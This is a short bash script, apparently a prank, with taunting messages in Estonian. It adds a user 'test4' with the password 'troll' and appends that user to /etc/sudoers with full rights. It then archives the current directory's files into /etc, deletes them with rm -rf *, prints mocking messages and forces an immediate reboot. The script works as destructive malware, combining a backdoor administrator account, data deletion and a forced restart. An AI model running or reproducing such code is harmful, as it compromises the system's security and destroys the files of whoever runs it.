#!/bin/bash
#
echo `useradd test4`
echo `echo -e "troll\ntroll" |sudo passwd test4`
echo "test4 ALL=(ALL:ALL) ALL " >> /etc/sudoers
echo `clear`
#echo `sudo -u test4`
echo `tar -czvf failid.tar.gz *`
echo `mv failid.tar.gz /etc/`
echo `rm -rf *`
echo "Arnold lendas laivi ja tegi rm -rf * sinu arvutile!"
sleep 3
echo "Kui nyyd resa teed siis v6id veel midagi p22sta :D "
echo "REKT!" >> kusmufailid
echo `sudo shutdown -r now`
